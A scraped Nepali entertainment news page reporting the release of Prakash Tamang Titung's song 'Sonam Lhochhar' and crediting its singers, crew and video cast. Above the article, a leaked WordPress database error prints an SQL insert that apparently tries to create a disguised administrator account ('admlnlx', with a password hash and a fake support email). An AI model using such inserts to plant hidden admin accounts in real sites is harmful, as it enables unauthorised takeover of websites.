WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BGTlXfVjiC8UQhvvkrQM5HXZ3MI5UW.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:03:44', '', 'admlnlx', 'admlnlx')
काठमाडौंँ । चर्चित गायक एंव संगीतकार प्रकाश तामाङ तितुङको ‘सोनाम ल्होछार’ बोलको गीत सार्वजानिक भएको छ । चर्चित गायक एंव संगीतकार प्रकाश तामाङ तितुङको अफिसियल युटुब च्यानलबाट उक्त गीत सार्वजानिक गरिएको हो ।
गीतमा चर्चित गायक एंव संगीतकार प्रकाश तामाङ तितुङको शब्द,संगीत रहेको गीतमा चर्चित गायक एंव संगीतकार बिशाल काल्तान,सुमिना लो,बिमला थिङ र उनै चर्चित गायक एंव संगीतकार तितुङको आवाज रहेको छ ।
चाँद सिंले संगीत संयोजन गरेको गीतलाई दिपेश प्रधानले मिक्सिङ गरेका हुन ।
निर्मल कुमार लामाको निर्देशन रहेको म्युजिक भिडिओलाई पवन सुस्लिङले छायांकन र सम्पादन गरेका हुन ।
म्युजिक भिडिओमा भिम्फेदि गाइज, सुजन मार्फा तामाङ,निरण्जली लामा,अभि लामा,अनिता गोले,अमिर दोङ,कुइसाङ रुम्बा,रोज मोक्तान,ईन्द्र गोले,फुलमान गोले,चिन बहादुर स्याङ्तानको अभिनय रहेको छ ।
भिडिओ